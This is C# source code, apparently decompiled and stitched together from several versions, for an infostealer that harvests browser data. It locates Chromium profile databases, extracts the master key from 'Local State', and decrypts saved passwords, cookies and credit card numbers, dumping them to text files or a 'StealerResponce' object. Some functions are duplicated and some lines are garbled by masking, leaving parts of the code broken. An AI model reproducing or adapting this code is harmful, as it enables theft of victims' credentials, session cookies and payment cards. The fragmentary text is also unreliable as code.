// Token: 0x06000184 RID: 388 RVA: 0x0000AEAC File Offset: 0x000090AC
public static void Get_CC(string profilePath, string Browser_Name, string Profile_Name)
{
try
{
SqlHandler sqlHandler = new SqlHandler(GetCookies.CreateTempCopy(Path.Combine(profilePath, "Web Data")));
sqlHandler.ReadTable("credit_cards");
int rowCount = sqlHandler.GetRowCount();
for (int i = 0; i < rowCount; i++)
{
Get_Credit_Cards.CCCouunt++;
try
{
string @string = Encoding.UTF8.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 4)), null));
string value = sqlHandler.GetValue(i, 1);
string value2 = sqlHandler.GetValue(i, 2);
string value3 = sqlHandler.GetValue(i, 3);
string value4 = sqlHandler.GetValue(i, 9);
Get_Credit_Cards.CC.Add(string.Format("{0}\t{1}/{2}\t{3}\t{4}\r\n******************************\r\n", new object[]
{
value,
value2,
value3,
@string,
value4
}));
}
catch
{
}
}
foreach (string text in Get_Credit_Cards.CC)
{
Get_Credit_Cards.CC_List.Add(string.Concat(new string[]
{
"Browser : ",
Browser_Name,
Environment.NewLine,
"Profie : ",
Profile_Name,
Environment.NewLine,
text
}));
}
Get_Credit_Cards.CC.Clear();
}
catch
{
}
}
public static void GetCards(string path2save)
{
try
{
List <string> Browsers = new List <string>();
List <string> BrPaths = new List <string>
{
Help.AppDate,
Help.LocalData
};
var APD = new List <string>();
foreach (var paths in BrPaths)
{
try
{
APD.AddRange(Directory.GetDirectories(paths));
}
catch { }
}
foreach (var path in APD)
{
string result = "";
string[] files = null;
try
{
Browsers.AddRange(Directory.GetFiles(path, "Web Data", SearchOption.AllDirectories));
files = Directory.GetFiles(path, "Web Data", SearchOption.AllDirectories);
}
catch { }
if (files != null)
{
foreach (var file in files)
{
try
{
if (File.Exists(file))
{
string str = "Unknown";
foreach (string name in BrowsersName)
{
if (path.Contains(name))
{
str = name;
}
}
string loginData = file;
if (File.Exists(bd))
{
File.Delete(bd);
}
File.Copy(loginData, bd);
SqlHandler sqlHandler = new SqlHandler(bd);
List <PassData> passDataList = new List <PassData>();
sqlHandler.ReadTable("credit_cards");
int rowCount = sqlHandler.GetRowCount();
for (int rowNum = 0; rowNum < rowCount; ++rowNum)
{
try
{
string Number = Encoding.UTF8.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 4)))),
Name = sqlHandler.GetValue(rowNum, 1),
Exp_m = sqlHandler.GetValue(rowNum, 2),
Exp_y = sqlHandler.GetValue(rowNum, 3),
Billing = sqlHandler.GetValue(rowNum, 9);
result += string.Format("{0}\t{1}/{2}\t{3}\t{4}\r\n******************************\r\n", Name, Exp_m, Exp_y, Number, Billing);
CC++;
}
catch
{
}
}
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
if (str == "Unknown")
{
File.AppendAllText(path2save + "\\" + "Cards_" + str + ".txt", result);
}
else
{
File.WriteAllText(path2save + "\\" + "Cards_" + str + ".txt", result);
}
}
}
catch
{
}
}
}
}
}
catch
{
}
}
public static void GetPasswordsOpera(string path2save)
{
try
{
List <string> Browsers = new List <string>();
List <string> BrPaths = new List <string>
{
Help.AppDate,
Help.LocalData
};
var APD = new List <string>();
foreach (var paths in BrPaths)
{
try
{
APD.AddRange(Directory.GetDirectories(paths));
}
catch { }
}
foreach (var path in APD)
{
string[] files = null;
string result = "";
try
{
Browsers.AddRange(Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories));
files = Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories);
}
catch { }
if (files != null)
{
foreach (var file in files)
{
try
{
if (File.Exists(file))
{
string str = "Unknown";
foreach (string name in BrowsersName)
{
if (path.Contains(name))
{
str = name;
}
}
string loginData = file;
string localState = file + "\\..\\Local State";
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
File.Copy(loginData, bd);
File.Copy(localState, ls);
SqlHandler sqlHandler = new SqlHandler(bd);
List <PassData> passDataList = new List <PassData>();
sqlHandler.ReadTable("logins");
string keyStr = File.ReadAllText(ls);
string[] lines = Regex.Split(keyStr, "\"");
int index = 0;
foreach (string line in lines)
{
if (line == "encrypted_key")
{
keyStr = lines[index + 2];
break;
}
index++;
}
byte[] keyBytes = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(keyStr)).Remove(0, 5));
byte[] masterKeyBytes = DecryptAPI.DecryptBrowsers(keyBytes);
int rowCount = sqlHandler.GetRowCount();
for (int rowNum = 0; rowNum < rowCount; ++rowNum)
{
try
{
string passStr = sqlHandler.GetValue(rowNum, 5);
byte[] pass = Encoding.Default.GetBytes(passStr);
string decrypted = "";
try
{
if (passStr.StartsWith("v10") || passStr.StartsWith("v11"))
{
byte[] iv = pass.Skip(3).Take(12).ToArray(); // From 3 to 15
byte[] payload = pass.Skip(15).ToArray();
decrypted = AesGcm256.Decrypt(payload, masterKeyBytes, iv);
}
else
{
decrypted = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(pass));
}
}
catch { }
result += "Url: " + sqlHandler.GetValue(rowNum, 1) + "\r\n";
result += "Login: "******"\r\n";
result += "Passwords: " + decrypted + "\r\n";
result += "Browser: " + str + "\r\n\r\n";
Passwords++;
}
catch
{
}
}
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
if (str == "Unknown")
{
File.AppendAllText(path2save + "\\" + "Passwords_" + str + ".txt", result);
}
else
{
File.WriteAllText(path2save + "\\" + "Passwords_" + str + ".txt", result);
}
}
}
catch
{
}
}
}
}
}
catch { }
}
public static void GetCookies(string path2save)
{
try
{
List <string> Browsers = new List <string>();
List <string> BrPaths = new List <string>
{
Help.AppDate,
Help.LocalData
};
var APD = new List <string>();
foreach (var paths in BrPaths)
{
try
{
APD.AddRange(Directory.GetDirectories(paths));
}
catch { }
}
foreach (var path in APD)
{
string result = "";
string[] files = null;
try
{
Browsers.AddRange(Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories));
files = Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories);
}
catch { }
if (files != null)
{
foreach (var file in files)
{
try
{
if (File.Exists(file))
{
string str = "Unknown";
foreach (string name in BrowsersName)
{
if (path.Contains(name))
{
str = name;
}
}
string loginData = file;
string localState = file + "\\..\\..\\Local State";
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
File.Copy(loginData, bd);
File.Copy(localState, ls);
SqlHandler sqlHandler = new SqlHandler(bd);
List <PassData> passDataList = new List <PassData>();
sqlHandler.ReadTable("cookies");
string keyStr = File.ReadAllText(ls);
string[] lines = Regex.Split(keyStr, "\"");
int index = 0;
foreach (string line in lines)
{
if (line == "encrypted_key")
{
keyStr = lines[index + 2];
break;
}
index++;
}
byte[] keyBytes = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(keyStr)).Remove(0, 5));
byte[] masterKeyBytes = DecryptAPI.DecryptBrowsers(keyBytes);
int rowCount = sqlHandler.GetRowCount();
for (int rowNum = 0; rowNum < rowCount; ++rowNum)
{
try
{
string valueStr = sqlHandler.GetValue(rowNum, 12);
byte[] value = Encoding.Default.GetBytes(valueStr);
string decrypted = "";
try
{
if (valueStr.StartsWith("v10"))
{
// Console.WriteLine("!=============== AES 256 GCM COOKIES ============!");
byte[] iv = value.Skip(3).Take(12).ToArray(); // From 3 to 15
byte[] payload = value.Skip(15).ToArray();
decrypted = AesGcm256.Decrypt(payload, masterKeyBytes, iv);
}
else
{
decrypted = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(value));
}
string host_key = sqlHandler.GetValue(rowNum, 1),
name = sqlHandler.GetValue(rowNum, 2),
PATH = sqlHandler.GetValue(rowNum, 4),
expires_utc = sqlHandler.GetValue(rowNum, 5),
secure = sqlHandler.GetValue(rowNum, 6);
result += string.Format("{0}\tFALSE\t{1}\t{2}\t{3}\t{4}\t{5}\r\n", host_key, PATH, secure.ToUpper(), expires_utc, name, decrypted);
Cookies++;
}
catch { }
}
catch { }
}
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
if (str == "Unknown")
{
File.AppendAllText(path2save + "\\" + "Cookies_" + str + ".txt", result);
}
else
{
File.WriteAllText(path2save + "\\" + "Cookies_" + str + ".txt", result);
}
}
}
catch { }
}
}
}
}
catch { }
}
// Token: 0x06000181 RID: 385 RVA: 0x0000A704 File Offset: 0x00008904
public static void Passwords_Grab(string profilePath, string browser_name, string profile)
{
try
{
Path.Combine(profilePath, "Login Data");
GetPasswords.browser_name_list.Add(browser_name);
GetPasswords.profile_list.Add(profile);
List <string> list = new List <string>();
string appDate = Helper.AppDate;
string localData = Helper.LocalData;
List <string> list2 = new List <string>();
list2.Add(appDate);
list2.Add(localData);
List <string> list3 = new List <string>();
foreach (string path in list2)
{
try
{
list3.AddRange(Directory.GetDirectories(path));
}
catch
{
}
}
foreach (string text in list3)
{
string[] array = null;
try
{
list.AddRange(Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories));
array = Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories);
}
catch
{
}
if (array != null)
{
foreach (string text2 in array)
{
try
{
if (File.Exists(text2))
{
string text3 = "Unknown";
foreach (string text4 in GetPasswords.BrowsersName)
{
if (text.Contains(text4))
{
text3 = text4;
}
}
string sourceFileName = text2;
string sourceFileName2 = text2 + "\\..\\..\\Local State";
if (File.Exists(GetPasswords.bd))
{
File.Delete(GetPasswords.bd);
}
if (File.Exists(GetPasswords.ls))
{
File.Delete(GetPasswords.ls);
}
File.Copy(sourceFileName, GetPasswords.bd);
File.Copy(sourceFileName2, GetPasswords.ls);
SqlHandler sqlHandler = new SqlHandler(GetPasswords.bd);
new List <GetPasswords.PassData>();
sqlHandler.ReadTable("logins");
string text5 = File.ReadAllText(GetPasswords.ls);
string[] array4 = Regex.Split(text5, "\"");
int num = 0;
string[] array3 = array4;
for (int j = 0; j < array3.Length; j++)
{
if (array3[j] == "encrypted_key")
{
text5 = array4[num + 2];
break;
}
num++;
}
byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text5)).Remove(0, 5)), null);
int rowCount = sqlHandler.GetRowCount();
for (int k = 0; k < rowCount; k++)
{
try
{
string value = sqlHandler.GetValue(k, 5);
byte[] bytes = Encoding.Default.GetBytes(value);
string text6 = "";
try
{
if (value.StartsWith("v10") || value.StartsWith("v11"))
{
byte[] iv = bytes.Skip(3).Take(12).ToArray <byte>();
text6 = AesGcm256.Decrypt(bytes.Skip(15).ToArray <byte>(), key, iv);
}
else
{
text6 = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(bytes, null));
}
}
catch
{
}
GetPasswords.credential.Add(string.Concat(new string[]
{
"Site_Url : ",
sqlHandler.GetValue(k, 1).Trim(),
Environment.NewLine,
"Login : "******"Password : "******"Browser : ",
text3,
Environment.NewLine,
"Profile : ",
profile,
Environment.NewLine,
text7
}));
}
GetPasswords.credential.Clear();
}
}
catch
{
}
}
}
}
}
catch
{
}
}
private StealerResponce GetPasswordsOpera()
{
List <StealerResponce.Password> passwords = new List <StealerResponce.Password>();
try
{
string bd = Path.GetTempPath() + "\\bd" + "62362712467" + ".tmp";
string ls = Path.GetTempPath() + "\\ls" + "62362712467" + ".tmp";
List <string> Browsers = new List <string>();
List <string> BrPaths = new List <string>
{
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
};
var APD = new List <string>();
foreach (var paths in BrPaths)
{
try
{
APD.AddRange(Directory.GetDirectories(paths));
}
catch { }
}
foreach (var path in APD)
{
string[] files = null;
string result = "";
try
{
Browsers.AddRange(Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories));
files = Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories);
}
catch { }
if (files != null)
{
foreach (var file in files)
{
try
{
if (File.Exists(file))
{
string str = "Unknown";
foreach (string name1 in BrowsersNames)
{
string name = crypter.Decypt(name1, "NekiS");
if (path.Contains(name))
{
str = name;
}
}
string loginData = file;
string localState = file + "\\..\\Local State";
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
File.Copy(loginData, bd);
File.Copy(localState, ls);
SqlHandler sqlHandler = new SqlHandler(bd);
sqlHandler.ReadTable("logins");
string keyStr = File.ReadAllText(ls);
string[] lines = Regex.Split(keyStr, "\"");
int index = 0;
foreach (string line in lines)
{
if (line == "encrypted_key")
{
keyStr = lines[index + 2];
break;
}
index++;
}
byte[] keyBytes = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(keyStr)).Remove(0, 5));
byte[] masterKeyBytes = DecryptAPI.DecryptBrowsers(keyBytes);
int rowCount = sqlHandler.GetRowCount();
for (int rowNum = 0; rowNum < rowCount; ++rowNum)
{
try
{
string passStr = sqlHandler.GetValue(rowNum, 5);
byte[] pass = Encoding.Default.GetBytes(passStr);
string decrypted = "";
try
{
if (passStr.StartsWith("v10") || passStr.StartsWith("v11"))
{
byte[] iv = pass.Skip(3).Take(12).ToArray(); // From 3 to 15
byte[] payload = pass.Skip(15).ToArray();
decrypted = AesGcm256.Decrypt(payload, masterKeyBytes, iv);
}
else
{
decrypted = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(pass));
}
}
catch { }
string url = sqlHandler.GetValue(rowNum, 1).Trim(new char[] { ' ', '\n' });
string login = sqlHandler.GetValue(rowNum, 3).Trim(new char[] { ' ', '\n' });
string password = decrypted.Trim(new char[] { ' ', '\n' });
if (!string.IsNullOrEmpty(url) && !string.IsNullOrEmpty(login) && !string.IsNullOrEmpty(password))
{
StealerResponce.Password passwordresult = new StealerResponce.Password();
//Console.WriteLine(sqlHandler.GetValue(rowNum, 1) + "\r");
passwordresult.url = url;
//Console.WriteLine(sqlHandler.GetValue(rowNum, 3) + "\r");
passwordresult.login = login;
//Console.WriteLine(decrypted + "\r");
passwordresult.password = password;
passwordresult.browser = str;
//Console.WriteLine();
passwords.Add(passwordresult);
}
}
catch { }
}
}
}
catch { }
}
if (File.Exists(bd))
{
File.Delete(bd);
}
if (File.Exists(ls))
{
File.Delete(ls);
}
}
}
}
catch
{
}
return(new StealerResponce()
{
Passwords = passwords,
});
}
